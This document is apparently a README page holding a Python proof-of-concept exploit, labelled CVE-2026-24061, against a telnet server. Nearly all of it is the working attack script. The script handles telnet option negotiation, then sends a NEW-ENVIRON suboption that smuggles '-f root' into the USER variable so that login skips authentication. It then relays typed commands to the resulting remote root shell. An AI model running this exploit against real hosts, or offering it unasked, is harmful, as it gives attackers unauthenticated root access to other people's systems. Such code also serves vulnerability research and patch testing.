README.md
Rendering markdown...
#!/usr/bin/env python
# CVE-2026-24061 PoC (USER="-f root" telnet -a 127.0.0.1 23)
# By @opscur (https://github.com/0p5cur)
import socket
import sys
import threading
import argparse
import os
IAC = 255
DONT = 254
DO = 253
WONT = 252
WILL = 251
SB = 250
SE = 240
def negotiate(sock, data):
clean_output = b""
i = 0
while i < len(data):
if data[i:i+1] == b'\xff':
if i + 1 >= len(data): break
cmd = ord(data[i+1:i+2]) if sys.version_info[0] < 3 else data[i+1]
if cmd in [DO, DONT, WILL, WONT]:
if i + 2 >= len(data): break
opt = ord(data[i+2:i+3]) if sys.version_info[0] < 3 else data[i+2]
if cmd == DO and opt != 39:
sock.sendall(bytes(bytearray([IAC, WONT, opt])))
elif cmd == WILL:
sock.sendall(bytes(bytearray([IAC, DONT, opt])))
i += 3
elif cmd == SB:
j = i + 2
while j < len(data):
if data[j:j+1] == b'\xf0': break
j += 1
i = j + 1
else:
i += 2
else:
clean_output += data[i:i+1]
i += 1
return clean_output
def reader(s):
while True:
try:
data = s.recv(4096)
if not data: os._exit(0)
text = negotiate(s, data)
if text:
if sys.version_info[0] >= 3:
sys.stdout.buffer.write(text)
else:
sys.stdout.write(text)
sys.stdout.flush()
except: break
def exploit(target, port):
print("[+] Connecting to " + str(target) + ":" + str(port) + "...")
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((target, port))
s.settimeout(None)
s.sendall(b'\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0')
t = threading.Thread(target=reader, args=(s,))
t.daemon = True
t.start()
import time
time.sleep(1)
if not t.is_alive():
print("[-] The target does not seem vulnerable")
return
while True:
cmd = sys.stdin.readline()
if not cmd: break
s.sendall(cmd.encode() if sys.version_info[0] >= 3 else cmd)
except (socket.timeout, ConnectionRefusedError, OSError):
print("[-] The target seems to be unreachable")
except KeyboardInterrupt:
s.close()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("target")
parser.add_argument("port", type=int, default=23, nargs='?')
args = parser.parse_args()
print("[+] POC by @opscur (https://github.com/0p5cur)")
exploit(args.target, args.port)
if __name__ == "__main__":
main()